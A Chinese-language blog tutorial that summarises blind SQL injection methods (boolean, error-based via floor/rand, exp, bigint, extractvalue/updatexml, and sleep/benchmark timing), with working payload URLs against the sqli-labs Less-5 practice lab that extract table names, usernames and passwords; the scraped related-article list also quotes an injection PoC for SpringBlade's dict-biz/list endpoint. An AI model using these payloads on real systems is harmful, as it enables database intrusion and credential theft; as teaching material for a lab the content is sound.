Junmin layツ
Junmin layツ

SQL 盲注方法总结

文章目录

    • 1,布尔盲注---构造逻辑判断
      • ①left(database(),1)
      • ②ascii(substr())=n
      • ③regexp正则注入
      • ④ord()和mid()函数
    • 2,报错盲注
      • ①concat()floor(x)rand()
      • ②使用exp进行SQL报错注入
      • ③bigint溢出注入
      • ④xpath函数报错注入
    • 3,延时注入
      • ①利用sleep()函数进行注入
      • ②利用BENCHMARK()进行延时注入

1,布尔盲注—构造逻辑判断

①left(database(),1)

语句为:

http://localhost/sqli-labs-master/Less-5/?id=1' and left(database(),1)='a'#

left(database(),1)>’s’ //left()函数
left(a,b)从左侧截取a的前b位
表示从数据库名字第一个字母是否等于a,是则返回true
爆数据表:

http://localhost/sqli-labs-master/Less-5/?id=1' and left((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)='e'--+

得到第一个表第一个字母为e,可采用二分法尝试。

http://localhost/sqli-labs-master/Less-5/?id=1' and left((select group_concat(table_name) from information_schema.tables where table_schema=database()),2)='em'--+

举一反三得到第一个表为emails。那怎么得到第二个表名称呢?我们采用limit()函数:
limit(m,n):从m开始取n条记录

http://localhost/sqli-labs-master/Less-5/?id=1' and left((select group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),1)>'a'--+

一直得到users表
之后继续得到password与username

②ascii(substr())=n

语句:

http://localhost/sqli-labs-master/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1))=101--+

substr(a,b,c)从b位置开始,截取字符串a的c长度。Ascii()将某个字符转换为ascii值
爆数据表:

http://localhost/sqli-labs-master/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1))=101--+

如何获取第一个表的第二位字符呢?
这里我们已经了解了substr()函数,这里使用substr(,2,1)即可。
其他同上,举一反三即可。

③regexp正则注入

因为本人不经常用此方法,此项不讲,可参考讲解

④ord()和mid()函数

语句:

http://localhost/sqli-labs-master/Less-5/?id=1' and ord(mid((select ifnull(cast(database() as char),0x20)from security.users order by id limit 0,1),1,1))>98--+

mid(a,b,c)从位置b开始,截取a字符串的c位
Ord()函数同ascii(),将字符转为ascii值
用法与ascii相似,举一反三即可。

2,报错盲注

基于报错的SQL盲注------构造payload让信息通过错误提示回显出来

①concat()floor(x)rand()

利用concat()floor(x)rand()函数进行报错注入,语法如下:

union select 1,count(*),concat(0x3a,0x3a,(user()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a--+

concat:计数
详细解释:https://blog.csdn.net/tbkken/article/details/8173074
a是concat(0x3a,0x3a,(user()),0x3a,0x3a,floor(rand()*2))的别名

函数 解释
FLOOR(x) 返回小于或等于x的最大整;SELECT FLOOR(1.5) – 返回1
RAND() 返回0->1的随机数: SELECT RAND() --0.93099315644334
RAND(x) 返回0->1的随机数,x值相同时返回的随机数相同: SELECT RAND(2) --1.5865798029924

group by:进行分组处理group by详解

以天书less-5来说明:
基础知识此处不讲,查看用户

http://localhost/sqli-labs-master/Less-5/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+

回显:
Duplicate entry ‘::root@localhost::1’ for key 'group_key’
表明该数据库用户名为:root@localhost
爆数据库:

http://localhost/sqli-labs-master/Less-5/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+

回显:
Duplicate entry ‘::security::1’ for key 'group_key’
表明该数据库名为:security
爆数据表:

http://localhost/sqli-labs-master/Less-5/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+

此时回显:Subquery returns more than 1 row
因为回显超过一行,导致回显失败,此时我们运用limit(start,length)
爆数据库第一个表:

http://localhost/sqli-labs-master/Less-5/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database()limit 0,1),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+

回显:Duplicate entry ‘::emails::1’ for key 'group_key’
表明数据库第一个表为emails,举一反三一直查寻到:
Duplicate entry ‘::users::1’ for key 'group_key’
查到users表,爆users表的第一列

http://localhost/sqli-labs-master/Less-5/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+

回显:Duplicate entry ‘::USER::1’ for key 'group_key’
这里就不重复造轮子了,一直报列,爆出username与password列
Duplicate entry ‘::username::1’ for key ‘group_key’
Duplicate entry ‘::password::1’ for key 'group_key’
报username与password数据段:

http://localhost/sqli-labs-master/Less-5/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select concat (username,' ',password) from users limit 0,1),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+

完成注入。

②使用exp进行SQL报错注入

详细原理参考大佬文章
Exp()为以e为底的对数函数;版本在5.5.5及其以上
以题作为典型理解尝试。仍然为天书less-5
爆数据库:

http://localhost/sqli-labs-master/Less-5/?id=1' union select (exp(~(select * from(select database())a))),2,3--+

爆数据表:

http://localhost/sqli-labs-master/Less-5/?id=1' union select 1,2,exp(~(select * from(select table_name from information_schema.tables where table_schema=database() limit 0,1)a))--+

爆列:

http://localhost/sqli-labs-master/Less-5/?id=1' union select 1,2,exp(~(select * from(select column_name from information_schema.columns where table_name='users' limit 0,1)a))--+

爆字段:

http://localhost/sqli-labs-master/Less-5/?id=1' union select 1,2,exp(~(select * from(select concat (username,' ',password) from users limit 0,1)a))--+

③bigint溢出注入

详细原理参考大佬文章
溢出一定要版本在5.5.5及其以上,不然不会回显出
以题作为典型理解尝试。仍然为天书less-5

http://localhost/sqli-labs-master/Less-5/?id=1' union select (!(select * from (select database())x) - ~0),2,3--+

更改都如exp一般,这里就不重复造轮子了。

④xpath函数报错注入

(1)extractvalue()
(2)updatexml()

名称 描述
ExtractValue() 使用XPath表示法从XML字符串中提取值
UpdateXML() 返回替换的XML片段 
ExtractValue(xml_frag, xpath_expr)

ExtractValue()接受两个字符串参数,一个XML标记片段 xml_frag和一个XPath表达式 xpath_expr(也称为 定位器); 它返回CDATA第一个文本节点的text(),该节点是XPath表达式匹配的元素的子元素。

第一个参数可以传入目标xml文档,第二个参数是用Xpath路径法表示的查找路径

例如:SELECT ExtractValue(’’, ‘/a/b’); 就是寻找前一段xml文档内容中的a节点下的b节点,这里如果Xpath格式语法书写错误的话,就会报错。这里就是利用这个特性来获得我们想要知道的内容。
利用concat函数将想要获得的数据库内容拼接到第二个参数中,报错时作为内容输出。

UpdateXML(xml_target, xpath_expr, new_xml)

xml_target:: 需要操作的xml片段
xpath_expr: 需要更新的xml路径(Xpath格式)
new_xml: 更新后的内容
这里和上面的extractvalue函数一样,当Xpath路径语法错误时,就会报错,报错内容含有错误的路径内容

extractvalue()进行注入:

http://localhost/sqli-labs-master/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e))--+

回显:

 XPATH syntax error: '~security~'

http://localhost/sqli-labs-master/Less-5/?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+

回显:

XPATH syntax error: '~emails,referers,uagents,users~'

重复造轮子就好。

updatexml()进行注入:

http://localhost/sqli-labs-master/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

回显:

XPATH syntax error: '~security~'

重复造轮子就好。

注意:extractvalue()中的xml_frag,updatexml()中的xml_target与new_xml参数可以任意值,不表实际含义,仅仅占用位,本人为了方便直接填了1

3,延时注入

①利用sleep()函数进行注入

语句为:

http://localhost/sqli-labs-master/Less-5/?id=1' and If(ascii(substr((select database()),1,1))=101,1,sleep(5))--+

sleep() :延时语句
if(condition,ture,fales) :条件语句,如果condition为true则执行ture语句,反之执行fales语句
ascii() :转换成ascii
substr(“string”,strart,length) :mid()也一样从哪开始取几位
爆数据库:

http://localhost/sqli-labs-master/Less-5/?id=1' and If(ascii(substr((select database()),1,1))=115,1,sleep(5))--+

当database的第一个字母ascii码=115时,回显正常,可以采用二分法
爆表单:

http://localhost/sqli-labs-master/Less-5/?id=1' and If(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=101,1,sleep(5))--+

那如何获取第二个表呢?思考一下!

这里可以看到我们上述的语句中使用的limit 0,1. 意思就是从第0个开始,获取第一个。那要获取第二个是不是就是limit 1,1!
其余与布尔盲注ascii运用相似。

②利用BENCHMARK()进行延时注入

语句:

http://localhost/sqli-labs-master/Less-5/?id=1' union select(if(substr(current,1,1)=char(115),benchmark(10000000,encode('msg','by 5 second')),null)),2,3 from (select database() as current) as tb1--+

运行encode(‘msg’,‘by 5 second’)操作50000000次

不知道为什么在爆数据表时报错。。。崩溃

http://localhost/sqli-labs-master/Less-5/?id=1' union select(if(substr(current,1,1)=char(115),benchmark(10000000,encode('msg','by 5 second')),null)),2,3 from (select table_name from information_schema.tables where table_schema=database() as current) as tb1--+

你可能感兴趣的:(注入)

  • SpringBlade dict-biz/list 接口 SQL 注入漏洞 文章永久免费只为良心 oracle数据库
    SpringBladedict-biz/list接口SQL注入漏洞POC:构造请求包查看返回包你的网址/api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,md5(1),0x7e),1)=1漏洞概述在SpringBlade框架中,如果dict-biz/list接口的后台处理逻辑没有正确地对用户输入进行过滤或参数化查询(PreparedSta
  • Web安全:Web体系架构存在的安全问题和解决方室 程序员-张师傅 前端安全web安全前端
    Web体系架构在提供丰富功能和高效服务的同时,也面临着诸多安全问题。这些问题可能涉及数据泄露、服务中断、系统被控制等多个方面,对企业和个人造成不可估量的损失。以下是对Web体系架构中存在的安全问题及解决方案的详细分析:Web体系架构存在的安全问题注入攻击SQL注入:攻击者通过在输入字段中插入恶意SQL代码,操控后台数据库,窃取、篡改或删除数据。OS命令注入:攻击者通过输入字段插入恶意代码,执行系统
  • 推动党史学习教育常态化长效化贵在知行合一 Mxz
    中共中央办公厅近日印发《关于推动党史学习教育常态化长效化的意见》(以下简称《意见》),就推动党史学习教育常态化长效化提出了六个方面要求、作出重大部署。这是贯彻落实党中央指示精神、不断巩固拓展党史学习教育成果的重要举措,必将为更加坚定自觉地牢记初心使命、在新的赶考之路上考出好成绩注入强大精神动能。在全党开展党史学习教育,是以习近平同志为核心的党中央立足百年党史新起点、着眼开创事业发展新局面作出的一项
  • 乘风破浪,我们眼里藏着努力和未来 刘娟娟_培训师
    居里夫人说:“17岁时你不漂亮,可以怪罪于母亲没有遗传好的容貌;但是30岁了依然不漂亮,就只能责怪自己,因为在那么漫长的日子里,你没有往生命里注入新的东西。”30岁之后相由心生,你内心的善良、智慧、经历都会写满整个脸。美一定是内外兼修我曾经遇到过很多女孩问我说说娟娟老师你怎么那么美,皮肤又好,还会穿搭。我笑笑想说其实是我天生底子好,但是我通常会说你要是稍加修饰美起来就没我啥事了。以前的我每天都是素
  • SpringSecurity初学总结 weixin_66442229 spring
    springSecurity安全框架基于Java的安全框架主要有:SpringSecurity和Shiro介绍基础概念安全框架是对用户访问权限的控制,保证应用的安全性。其主要的工作是用户认证和用户授权|鉴权主要应用于Spring的企业应用系统,提供声明式的安全访问控制解决方案。它提供了一组可以在Spring应用上下文中配置的Bean能很好的结合Spring的DI依赖注入和AOP面向切面编程功能应用
  • java获取applicationcontext,SpringBoot获取ApplicationContext的3种方式 花儿街参考
    ApplicationContext是什么?简单来说就是Spring中的容器,可以用来获取容器中的各种bean组件,注册监听事件,加载资源文件等功能。ApplicationContext获取的几种方式1直接使用Autowired注入@ComponentpublicclassBook1{@AutowiredprivateApplicationContextapplicationContext;pub
  • 以太坊DApp开发指南 Kirn
    DApp架构设计DApp架构.png如上图,DApp的架构我们可以简单分为以上三种类型:轻钱包模式、重钱包模式和兼容模式。轻钱包模式轻钱包模式下我们需要有一个开放HttpRPC协议的节点与钱包通信,这个节点可以是任意链上的节点。轻钱包通常会作为一个浏览器插件存在,插件在运行时会自动注入Web3框架,DApp可以通过Web3与区块链节点通信。当DApp只是单纯的获取数据时是不需要钱包介入的,但是当D
  • 《Android进阶之光》— Android 书籍 王睿丶 Android永无止境《Android进阶之光》Android书籍Androidphoenix移动开发
    文章目录第1章Android新特性1第2章MaterialDesign48第3章View体系与自定义View87第4章多线程编程165第5章网络编程与网络框架204第6章设计模式271第7章事件总线308第8章函数响应式编程333第9章注解与依赖注入框架382第10章应用架构设计422第11章系统架构与MediaPlayer框架460出版年:2017-7简介:《Android进阶之光》是一本And
  • 北斗赋能万物互联:新质生产力的强劲驱动力 GeoSaaS 地理信息智慧城市机器人物联网人工智能无人机
    在数字化转型的大潮中,中国自主研制的北斗卫星导航系统,作为国家重大空间基础设施,正以前所未有的力量推动着万物互联时代的到来,成为新质生产力发展的重要基石。本文将深入剖析北斗系统如何以其独特的技术优势和广泛应用场景,为各行业注入新的活力,加速经济社会的智能化升级。一、北斗系统的战略地位与技术演进自2000年第一颗北斗导航卫星成功发射以来,北斗系统经历了从试验系统到全球组网的历史性跨越,如今已成为与G
  • 2021国家开放大学计算机网络安全技术形成性考核五 chaoliang.top 国开试题网络安全网络安全
    本人还会继续更新其他国家开放大学的试题,请大家多多关注,如果有什么建议,还希望大家提出来,本人也好完善本人在测试答案的时候发现,本章考试回顾结果中明明选对了答案,但是提示错误的情况,并且该题没有提示正确答案,这种情况应该是国开试题出现bug导致,请大家不要担心,如果有追求完美的同学,多答几次,可能就会避开这种题,因为出题是随机的。1.SQL注入一般可通过网页表单直接输入选择多项:对错正确答案:对2
  • 诗词与摄影笔记 时空_832e
    忆江南闲梦远,南国正清秋。千里江山寒色暮,芦花深处泊孤舟。笛在月明楼。捣练子令深院静,小庭空,断续寒砧断续风。无奈夜长人不寐,数声和月到帘栊。李后主的两首小令。我们知道词是用来配乐歌唱的,要符合声律要求,否则即是像苏东坡这样的文豪,也要被李清照冠以“不协音律”的批评。以文字堆砌意象,注入情感,是词的创作手法和表现手法。但对于几十、乃至十几个字的小令,有时候客观白描会因囿于篇幅而显得苍白空洞,所以像
  • 春光无限 爱心天使_62f9
    看春光无限好,尽在眼前。清晨,万物复苏,一缕阳光透过云层直射大地,唤醒了地上的小草,刚刚露出小脑瓜儿的它们,好奇的看着走在路上的行人,时不时的心情还抖那么一下,害怕行人走偏了路,踩到它们的小脑瓜儿上,会很疼的。早起的人们这个时候走出家门,来到外面,尽管带着口罩,那清新的空气也能通过鼻孔,嘴巴进入身体,似一股清泉涌入全身,给身体注入了青春的活力,随着呼吸把二氧化碳排出体外,新鲜的空气充满了身躯,人们
  • 组件通信——provide 和 inject 实现爷孙组件通信 你不讲 wood javascriptvue.js前端
    provide和inject实现爷孙组件通信介绍provide和inject是Vue.js提供的一种在组件之间共享数据的机制,它允许在组件树中的任何地方注入依赖项。这对于跨越多个层级的组件间通信特别有用,因此无需手动将prop数据逐层传递下去。provide:在一个组件中使用provide方法来定义要提供的数据或方法。provide方法返回一个对象,该对象包含了要提供的数据或方法。inject:在
  • 框架必知必会——Autofac概述及应用 Matrix Y WPFwpfautofac
    Autofac概述Autofac是一个依赖注入框架,它遵循控制反转(InversionofControl,IoC)原则,通过构造函数注入、属性注入等方式来管理对象的依赖关系。它的核心原理是将对象的创建和生命周期管理交给容器,而不是在代码中手动管理。Autofac的作用主要有以下几点解耦:通过依赖注入,将组件的创建和依赖关系从业务逻辑中分离,使代码更加模块化和可维护。管理生命周期:可以控制对象的生命
  • 【网络安全】漏洞挖掘之CVE-2019-9670+检测工具 秋说 网络安全web安全漏洞挖掘CVE
    未经许可,不得转载。文章目录漏洞介绍正文工具漏洞介绍CVE-2019-9670是一个与ZimbraCollaborationSuite(ZCS)相关的严重漏洞。ZCS中的AutoDiscover服务存在不正确的XML解析处理,该漏洞可被利用来注入恶意XML代码(例如外部实体注入(XXE)攻击),从而导致服务器任意文件读取或远程代码执行(RCE)。Zimbra]>
  • springboot~注册不同级别包里的bean~scanBasePackages 老飞949 java学习程序人生springstruts
    对于springboot来说,它会把当前应用程序所在的包装载到ioc容器里,让使用者可以直接Autowired注入它们,一般的项目结果是这样的,这个项目包下有main方法,它将会把nacosdemo这个包里面所有的bean都扫描出来,然后在程序启动时,nacosdemo里的bean就会被自动注册了。目前我们做一个测试,在nacosdemo包外层再建立一个包common,在里面写个组件,然后在nac
  • 程序员必看:图解 Spring 循环依赖,看过之后再也不怕面试了 陪伴她的梦
    前言Spring如何解决的循环依赖,是近两年流行起来的一道Java面试题。其实笔者本人对这类框架源码题还是持一定的怀疑态度的。如果笔者作为面试官,可能会问一些诸如“如果注入的属性为null,你会从哪几个方向去排查”这些场景题。那么既然写了这篇文章,闲话少说,发车看看Spring是如何解决的循环依赖,以及带大家看清循环依赖的本质是什么。正文通常来说,如果问Spring内部如何解决循环依赖,一定是单默
  • 企微自动群发:高效营销与智能沟通的双重引擎 bjshinegood 企业微信人工智能
    在数字化时代,企业营销与内部沟通的方式正经历着深刻的变革。企业微信(简称“企微”)作为企业级通讯与协作平台,凭借其强大的功能和稳定的运行环境,成为了众多企业实现高效营销与智能沟通的重要工具。其中,企微自动群发功能更是以其自动化、精准化、智能化的特点,为企业的营销与沟通工作注入了新的活力。一、企微自动群发的定义与优势企微自动群发,是指通过企业微信平台及其辅助工具,实现消息内容的自动编写、定时发送、精
  • 深入探究Spring Framework源码与核心组件 纸寿司
    本文还有配套的精品资源,点击获取简介:SpringFramework是Java开发中广泛使用的框架,其源码的阅读和理解对于开发者来说是宝贵的学习资源。本文将介绍依赖注入、ApplicationContext、Bean生命周期、AOP、数据访问集成、MVC模式、注解驱动开发、测试支持、SpringBoot以及SpringCloud等关键概念。通过这些核心组件的学习,可以更好地掌握Spring的高级功
  • 【软件逆向】第39课,软件逆向安全工程师之动态补丁,每天5分钟学习逆向吧! Karle_ 软件逆向学习安全学习汇编OD工具游戏
    动态补丁是一种在程序运行时对其行为进行修改的技术。它通常用于修复程序错误、改变程序功能或绕过某些限制,而无需修改原始程序文件。以下是动态补丁的一些基本概念和方法:基本概念:热补丁(HotPatching):在程序运行时应用补丁,无需重启程序。代码注入:将新代码注入到正在运行的程序中,以改变其行为。函数挂钩(Hooking):拦截并修改特定函数的调用,以插入自定义代码。常见方法:API钩子:通过钩子
  • 最新网络安全(黑客)——自学篇 黑客小雨 web安全安全
    *需要的小伙伴关注我第一阶段:基础操作入门,学习基础知识入门的第一步是学习一些当下主流的安全工具课程并配套基础原理的书籍,一般来说这个过程在1个月左右比较合适。在这个阶段,你已经对网络安全有了基本的了解。如果你学完了第一步,相信你已经在理论上明白了上面是sql注入,什么是xss攻击,对burp、msf、cs等安全工具也掌握了基础操作。这个时候最重要的就是开始打地基!所谓的“打地基”其实就是系统化的
  • Spring-IOC容器-Bean管理-基于XML方式超详解! 2401_86367123 面试辅导大厂内推springxmlwindows
    注入属性-内部bean①在实体类之间表示一对多关系,员工表示所属部门,使用对象类型属性进行表示//部门类publicclassDept{privateStringdname;publicvoidsetDname(Stringdname){this.dname=dname;}}//员工类publicclassEmp{privateStringename;privateStringgender;//员
  • mybatis批量插入、mybatis-plus批量插入、mybatis实现insertList、mybatis自定义实现批量插入 五月天的尾巴 springbootmybatismybatis批量插入
    文章目录一、mybatis新增批量插入1.1、引入依赖1.2、自定义通用批量插入Mapper1.3、把通用方法注册到mybatisplus注入器中1.4、实现InsertList类1.5、需要批量插入的dao层继承批量插入Mapper二、可能遇到的问题2.1、Invalidboundstatement众所周知,mybatisplus提供的BaseMapper里只有单条插入的方法,没有批量插入的方法
  • 2023-10-27 耕而陶_茶
    耕而陶聊茶器:八、宋代点茶兴,茶盏贵黑青(四)接下来,我们看一下宋代主要品茶方式-点茶的流程。炙茶-碾茶-罗茶-候汤-熁盏-点茶。需先把盏烤热,接着视盏之大小用茶匙取碾后罗好的茶末入盏。煮好水,先注入少许汤水,把茶膏调制均匀,并用金属茶匙或竹制的茶筅在盏中“回环击拂”,“回环击拂”可以理解为有技巧地搅拌。需要知道的是,宋初用茶匙击拂,宋中后期则用竹筅。如蔡襄所记:“茶匙,茶匙要重,击拂有力。黄金为
  • Spring Interceptor Draper
    Spring中使用Interceptor拦截器与Servlet的listener比较相似,同样是监听请求,同样需要配置,一个是在web.xml中,Spring拦截器是在Spring配置文件中拦截未登录用户访问某些连接拦截日志信息拦截SQL注入执行顺序是preHandle->controller->postHandle->afterCompletionSpringInterceptor属于链式调用,
  • spring boot 之自动装配 luckyHarry4
    前言在最初接触spring的时候,还是使用xml进行装配,我记得很清楚,当时分别配置了spring-dao.xml,spring-service.xml,spring-controller.xml。然后把所有需要用到的扫包,注入bean,以及配置,全都一股脑的塞进xml中,虽然出发点很好,不用在java代码中硬编码了,但是xml的可读性并不是很好,那阵子,真是痛苦的要命。正文后来逐渐的接触到了sp
  • HP 应用程序如何防止 SQL 注入攻击提高程序安全稳定性? xiaohuojian1 android
    在PHP应用程序中,防止SQL注入攻击是确保程序安全和稳定的关键步骤。SQL注入攻击可以让恶意用户通过操控SQL查询来访问、修改或删除数据库中的数据,严重时甚至可能导致系统的完全控制。以下是防止SQL注入攻击的有效策略和最佳实践,以帮助提高PHP应用程序的安全性和稳定性。一、使用预处理语句和参数化查询1.预处理语句https://github.com/xhj2/p/issues/7预处理语句是防止
  • VUE3学习 第五章 Teleport传送组件、keep-alive缓存组件、transition动画组件、transition-group过度、依赖注入Provide/Inject、兄弟组件Mitt Hyman-ya vue3+ts+vite学习缓存javascript
    一、Teleport传送组件TeleportVue3.0新特性之一。Teleport是一种能够将我们的模板渲染至指定DOM节点,不受父级style、v-show等属性影响,但data、prop数据依旧能够共用的技术;类似于React的Portal。主要解决的问题因为Teleport节点挂载在其他指定的DOM节点下,完全不受父级style样式影响1.使用方法通过to属性插入指定元素位置to=“bod
  • Web应用防火墙 Smile灬凉城666 网络安全WAF安全
    一、定义与目的WAF是一种特殊类型的防火墙,专门设计用于监视、过滤和阻挡进出Web应用的HTTP流量。其主要目的是保护Web应用免受如XSS(跨站脚本)、SQL注入、会话劫持等网络攻击。二、工作原理WAF工作在应用层,即OSI模型的第七层。它通过对HTTP/HTTPS请求进行解析、协议检测、攻击识别和恶意行为阻断等步骤来保护Web应用。具体来说,WAF会解析进入Web应用的HTTP/HTTPS请求
  • 网站被挂黑链是什么原因,如何解决挂黑链问题! 南帝seo seo技术
    前几天网上有个人,他说的他网站被挂了黑链,问我怎么解决,我用检测工具已检查果然是被别人挂了黑链,域名放到qq输入框里面就是显示飘红,放到微信里面根本就打不开,被拦截了。那么,接下来南帝seo老师就为大家讲解被挂黑链的原因以及如何解决。一、网站被挂黑链是什么原因网站被挂黑链了,原因就是所谓的黑客入侵了你的服务器或者是你网站程序有漏洞通过你网站漏洞进行注入脚本代码放入一些大量的灰色词进去,还有一种就是
  • 戴尔笔记本win8系统改装win7系统 sophia天雪 win7戴尔改装系统win8
    戴尔win8 系统改装win7 系统详述 第一步:使用U盘制作虚拟光驱:         1)下载安装UltraISO:注册码可以在网上搜索。         2)启动UltraISO,点击“文件”—》“打开”按钮,打开已经准备好的ISO镜像文
  • BeanUtils.copyProperties使用笔记 bylijinnan java
    BeanUtils.copyProperties VS PropertyUtils.copyProperties 两者最大的区别是: BeanUtils.copyProperties会进行类型转换,而PropertyUtils.copyProperties不会。 既然进行了类型转换,那BeanUtils.copyProperties的速度比不上PropertyUtils.copyProp
  • MyEclipse中文乱码问题 0624chenhong MyEclipse
    一、设置新建常见文件的默认编码格式,也就是文件保存的格式。 在不对MyEclipse进行设置的时候,默认保存文件的编码,一般跟简体中文操作系统(如windows2000,windowsXP)的编码一致,即GBK。 在简体中文系统下,ANSI 编码代表 GBK编码;在日文操作系统下,ANSI 编码代表 JIS 编码。 Window-->Preferences-->General -
  • 发送邮件 不懂事的小屁孩 send email
    import org.apache.commons.mail.EmailAttachment; import org.apache.commons.mail.EmailException; import org.apache.commons.mail.HtmlEmail; import org.apache.commons.mail.MultiPartEmail;
  • 动画合集 换个号韩国红果果 htmlcss
    动画 指一种样式变为另一种样式 keyframes应当始终定义0 100 过程 1 transition  制作鼠标滑过图片时的放大效果 css .wrap{ width: 340px;height: 340px; position: absolute; top: 30%; left: 20%; overflow: hidden; bor
  • 网络最常见的攻击方式竟然是SQL注入 蓝儿唯美 sql注入
    NTT研究表明,尽管SQL注入(SQLi)型攻击记录详尽且为人熟知,但目前网络应用程序仍然是SQLi攻击的重灾区。 信息安全和风险管理公司NTTCom Security发布的《2015全球智能威胁风险报告》表明,目前黑客攻击网络应用程序方式中最流行的,要数SQLi攻击。报告对去年发生的60亿攻击 行为进行分析,指出SQLi攻击是最常见的网络应用程序攻击方式。全球网络应用程序攻击中,SQLi攻击占
  • java笔记2 a-john java
    类的封装: 1,java中,对象就是一个封装体。封装是把对象的属性和服务结合成一个独立的的单位。并尽可能隐藏对象的内部细节(尤其是私有数据) 2,目的:使对象以外的部分不能随意存取对象的内部数据(如属性),从而使软件错误能够局部化,减少差错和排错的难度。 3,简单来说,“隐藏属性、方法或实现细节的过程”称为——封装。 4,封装的特性:       4.1设置
  • [Andengine]Error:can't creat bitmap form path “gfx/xxx.xxx” aijuans 学习Android遇到的错误
            最开始遇到这个错误是很早以前了,以前也没注意,只当是一个不理解的bug,因为所有的texture,textureregion都没有问题,但是就是提示错误。 昨天和美工要图片,本来是要背景透明的png格式,可是她却给了我一个jpg的。说明了之后她说没法改,因为没有png这个保存选项。 我就看了一下,和她要了psd的文件,还好我有一点
  • 自己写的一个繁体到简体的转换程序 asialee java转换繁体filter简体
              今天调研一个任务,基于java的filter实现繁体到简体的转换,于是写了一个demo,给各位博友奉上,欢迎批评指正。          实现的思路是重载request的调取参数的几个方法,然后做下转换。          
  • android意图和意图监听器技术 百合不是茶 android显示意图隐式意图意图监听器
    Intent是在activity之间传递数据;Intent的传递分为显示传递和隐式传递   显式意图:调用Intent.setComponent() 或 Intent.setClassName() 或 Intent.setClass()方法明确指定了组件名的Intent为显式意图,显式意图明确指定了Intent应该传递给哪个组件。   隐式意图;不指明调用的名称,根据设
  • spring3中新增的@value注解 bijian1013 javaspring@Value
            在spring 3.0中,可以通过使用@value,对一些如xxx.properties文件中的文件,进行键值对的注入,例子如下: 1.首先在applicationContext.xml中加入:  <beans xmlns="http://www.springframework.
  • Jboss启用CXF日志 sunjing logjbossCXF
    1. 在standalone.xml配置文件中添加system-properties:     <system-properties>        <property name="org.apache.cxf.logging.enabled" value=&
  • 【Hadoop三】Centos7_x86_64部署Hadoop集群之编译Hadoop源代码 bit1129 centos
      编译必需的软件 Firebugs3.0.0 Maven3.2.3 Ant JDK1.7.0_67 protobuf-2.5.0 Hadoop 2.5.2源码包       Firebugs3.0.0   http://sourceforge.jp/projects/sfnet_findbug
  • struts2验证框架的使用和扩展 白糖_ 框架xmlbeanstruts正则表达式
    struts2能够对前台提交的表单数据进行输入有效性校验,通常有两种方式: 1、在Action类中通过validatexx方法验证,这种方式很简单,在此不再赘述; 2、通过编写xx-validation.xml文件执行表单验证,当用户提交表单请求后,struts会优先执行xml文件,如果校验不通过是不会让请求访问指定action的。 本文介绍一下struts2通过xml文件进行校验的方法并说
  • 记录-感悟 braveCS 感悟
    再翻翻以前写的感悟,有时会发现自己很幼稚,也会让自己找回初心。   2015-1-11 1. 能在工作之余学习感兴趣的东西已经很幸福了; 2. 要改变自己,不能这样一直在原来区域,要突破安全区舒适区,才能提高自己,往好的方面发展; 3. 多反省多思考;要会用工具,而不是变成工具的奴隶; 4. 一天内集中一个定长时间段看最新资讯和偏流式博
  • 编程之美-数组中最长递增子序列 bylijinnan 编程之美
    import java.util.Arrays; import java.util.Random; public class LongestAccendingSubSequence { /** * 编程之美 数组中最长递增子序列 * 书上的解法容易理解 * 另一方法书上没有提到的是,可以将数组排序(由小到大)得到新的数组, * 然后求排序后的数组与原数
  • 读书笔记5 chengxuyuancsdn 重复提交struts2的token验证
    1、重复提交 2、struts2的token验证 3、用response返回xml时的注意 1、重复提交 (1)应用场景 (1-1)点击提交按钮两次。 (1-2)使用浏览器后退按钮重复之前的操作,导致重复提交表单。 (1-3)刷新页面 (1-4)使用浏览器历史记录重复提交表单。 (1-5)浏览器重复的 HTTP 请求。 (2)解决方法 (2-1)禁掉提交按钮 (2-2)
  • [时空与探索]全球联合进行第二次费城实验的可能性 comsci
         二次世界大战前后,由爱因斯坦参加的一次在海军舰艇上进行的物理学实验 -费城实验   至今给我们大家留下很多迷团.....      关于费城实验的详细过程,大家可以在网络上搜索一下,我这里就不详细描述了      在这里,我的意思是,现在
  • easy connect 之 ORA-12154: TNS: 无法解析指定的连接标识符 daizj oracleORA-12154
    用easy connect连接出现“tns无法解析指定的连接标示符”的错误,如下: C:\Users\Administrator>sqlplus username/[email protected]:1521/orcl SQL*Plus: Release 10.2.0.1.0 – Production on 星期一 5月 21 18:16:20 2012 Copyright (c) 198
  • 简单排序:归并排序 dieslrae 归并排序
    public void mergeSort(int[] array){ int temp = array.length/2; if(temp == 0){ return; } int[] a = new int[temp]; int
  • C语言中字符串的\0和空格 dcj3sjt126com c
       \0 为字符串结束符,比如说:                       abcd (空格)cdefg; 存入数组时,空格作为一个字符占有一个字节的空间,我们
  • 解决Composer国内速度慢的办法 dcj3sjt126com Composer
    用法: 有两种方式启用本镜像服务: 1 将以下配置信息添加到 Composer 的配置文件 config.json 中(系统全局配置)。见“例1” 2 将以下配置信息添加到你的项目的 composer.json 文件中(针对单个项目配置)。见“例2” 为了避免安装包的时候都要执行两次查询,切记要添加禁用 packagist 的设置,如下 1 2 3 4 5
  • 高效可伸缩的结果缓存 shuizhaosi888 高效可伸缩的结果缓存
